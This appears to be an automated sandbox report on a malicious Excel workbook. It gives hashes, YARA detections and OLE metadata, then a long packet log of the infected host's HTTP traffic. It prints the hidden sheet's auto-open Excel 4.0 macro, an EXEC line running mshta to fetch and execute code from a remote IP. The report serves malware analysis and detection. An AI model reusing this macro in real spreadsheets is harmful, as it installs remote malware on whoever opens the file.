                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):86528
                                                                                                                  Entropy (8bit):7.100278057839206
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3T:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxT
                                                                                                                  MD5:DDDAE242BE9D69182C82ED3AD608CD22
                                                                                                                  SHA1:6A892E72C3BB01203F2C6BF593A45B5BC300E073
                                                                                                                  SHA-256:85F3C947695FA054D71EB4C5EFF5D4D2F164D6D3895A5F4C87428FB3AA1BC1F5
                                                                                                                  SHA-512:90D3E159B367F14F12F144BB7F1F0E6F60EE84BE19A19E8F40545918714325609C44DC95C5203675182401327C6BA433EC8BD79BE43A6A89C6C0EE7C59DB845F
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\imedpub_6.xls, Author: John Lambert @JohnLaTwC
                                                                                                                  • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\imedpub_6.xls, Author: Joe Security
                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):548864
                                                                                                                  Entropy (8bit):6.980518796737633
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:B2AavzUBPSczbeeTLjvNyMwWd3DYr6i64/:OUBPSczbeeTnvhZDWA
                                                                                                                  MD5:8A6FB79B56B4C5F45322AAA8150C5E36
                                                                                                                  SHA1:09453D0478D6725C5ECFBD1644CCC156811F0A6C
                                                                                                                  SHA-256:DCC5DFE8C7150DD55E2F22EEBAE19F04EFAFA214DC7E1366A0CF4CCC7E616119
                                                                                                                  SHA-512:2F06489632ADEA7B67D544B3B0491B78AEE29F3C91B38251445ABA70CAF148EF6A1ADCC4158C1B85DC9F2036F790A2AF9622DDF7F3FF85D67A19B87BC5BA7F4F
                                                                                                                  Malicious:false
                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                  Entropy (8bit):7.096975054765422
                                                                                                                  TrID:
                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                  File name:imedpub_6.xls
                                                                                                                  File size:86588
                                                                                                                  MD5:eee4085b8c00a4dbae2459b0f97ebeb7
                                                                                                                  SHA1:c449b3584ff6db4b37c402aa27ed8b6793b5bd74
                                                                                                                  SHA256:b164d04bb1b4cd3d543360e74d6bc1407a85aabb63ea43b31deacbc02f72840a
                                                                                                                  SHA512:194cc0d0667bf67d71bb2653a523113191a123078451fed8ab74b1924d8b3fce4de18393483da839a876c1efff906100e20894142630837f4ccf980cbc09312e
                                                                                                                  SSDEEP:1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
                                                                                                                  Icon Hash:e4eea286a4b4bcb4
                                                                                                                  Document Type:OLE
                                                                                                                  Number of OLE Files:1
                                                                                                                  Has Summary Info:True
                                                                                                                  Application Name:Microsoft Excel
                                                                                                                  Encrypted Document:False
                                                                                                                  Contains Word Document Stream:False
                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                  Contains Visio Document Stream:False
                                                                                                                  Contains ObjectPool Stream:
                                                                                                                  Flash Objects Count:
                                                                                                                  Contains VBA Macros:True
                                                                                                                  Code Page:1251
                                                                                                                  Author:xXx
                                                                                                                  Last Saved By:xXx
                                                                                                                  Create Time:2022-01-27 23:41:00
                                                                                                                  Last Saved Time:2022-01-28 06:31:03
                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                  Security:0
                                                                                                                  Document Code Page:1251
                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                  Company:
                                                                                                                  Contains Dirty Links:False
                                                                                                                  Shared Document:False
                                                                                                                  Changed Hyperlinks:False
                                                                                                                  Application Version:1048576
                                                                                                                  General
                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                  File Type:data
                                                                                                                  Stream Size:4096
                                                                                                                  Entropy:0.324918127833
                                                                                                                  Base64 Encoded:False
                                                                                                                  General
                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                  File Type:data
                                                                                                                  Stream Size:4096
                                                                                                                  Entropy:0.263079431268
                                                                                                                  Base64 Encoded:False
                                                                                                                  General
                                                                                                                  Stream Path:Workbook
                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                  Stream Size:76002
                                                                                                                  Entropy:7.62172227998
                                                                                                                  Base64 Encoded:True
                                                                                                                  Name:REEEEEEEE
                                                                                                                  Type:3
                                                                                                                  Final:False
                                                                                                                  Visible:False
                                                                                                                  Protected:False
REEEEEEEE | 3 | False | 0 | False | post
2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")
5,2,=HALT()
                                                                                                                  Name:REEEEEEEE
                                                                                                                  Type:3
                                                                                                                  Final:False
                                                                                                                  Visible:False
                                                                                                                  Protected:False
                                                                                                                  REEEEEEEE3False0Falsepre2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/28/22-21:01:38.683580 | TCP | 2034631 | ET TROJAN Maldoc Activity (set) | 49168 | 80 | 192.168.2.22 | 91.240.118.172
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                  Jan 28, 2022 21:02:00.910326958 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.910351992 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.910389900 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.910428047 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.910433054 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.910465956 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.910504103 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:00.910516977 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:00.910942078 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.089692116 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089725971 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089739084 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089752913 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089766026 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089777946 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089792013 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089807987 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089821100 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089833975 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089844942 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089874029 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089886904 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089903116 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089920998 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089934111 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089946985 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089960098 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089972973 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089986086 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089999914 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.089999914 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090013027 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090024948 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090039015 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090054989 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090058088 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090068102 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090081930 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090081930 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090096951 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090114117 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090114117 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090126038 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090138912 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090152979 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090152025 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090164900 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090174913 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090178013 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090190887 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090203047 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090203047 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090215921 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090228081 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090228081 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090240002 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090251923 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090254068 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090262890 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090276003 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090276957 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090289116 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.090300083 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090341091 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.090676069 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.269572020 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269608021 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269622087 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269640923 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269658089 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269674063 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269690990 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269709110 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269725084 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269737005 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269737005 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.269748926 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269767046 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.269768000 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269773960 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.269784927 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269800901 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269813061 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.269818068 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269834995 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269859076 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.269865036 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269874096 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.269887924 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269903898 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269918919 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269931078 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.269936085 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269951105 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269963026 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.269967079 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269984007 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.269990921 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.269999981 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270015955 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270025015 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.270031929 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270046949 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270059109 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270070076 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.270073891 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270081997 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.270091057 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270107031 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270113945 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.270123959 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270138979 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270153999 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270164013 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.270169973 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270184994 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.270185947 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270201921 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270210981 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.270217896 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270234108 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270241022 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.270248890 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270265102 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.270273924 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.270303011 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.270795107 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449640989 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449671984 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449686050 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449698925 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449716091 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449732065 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449748993 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449764967 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449780941 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449799061 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449815035 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449831009 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449845076 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449872971 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449882984 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.449887037 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449903011 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449907064 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.449919939 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449934959 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449949980 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449959040 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.449966908 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449981928 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.449990034 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989552975 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989567995 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989573002 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989583969 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989598989 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989615917 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989615917 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989630938 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989648104 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989661932 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989662886 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989676952 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:01.989692926 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:01.989830017 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.168822050 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168853998 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168865919 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168879032 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168895960 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168912888 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168927908 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168945074 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168956041 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168972969 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168989897 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.168991089 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169006109 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169013023 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169023037 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169023037 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169039011 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169054985 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169070959 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169073105 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169086933 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169102907 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169117928 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169120073 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169133902 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169150114 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169164896 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169167995 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169181108 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169197083 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169198990 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169215918 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169231892 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169248104 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169250965 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169262886 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169279099 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169294119 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169296026 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169344902 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169361115 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169377089 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169378996 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169392109 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169406891 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169413090 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.169423103 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.169440031 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348356962 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348417997 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348448038 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348479986 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348517895 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348547935 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348556995 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348593950 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348608017 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348633051 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348671913 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348709106 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348718882 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348747969 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348786116 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348820925 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348831892 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348859072 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348895073 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348936081 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.348938942 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.348975897 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349014044 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349052906 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349057913 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.349091053 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349127054 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349164963 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349170923 CET4917080192.168.2.22103.206.244.105
                                                                                                                  Jan 28, 2022 21:02:02.349203110 CET8049170103.206.244.105192.168.2.22
                                                                                                                  Jan 28, 2022 21:02:02.349241018 CET8049170103.206.244.105192.168.2.22
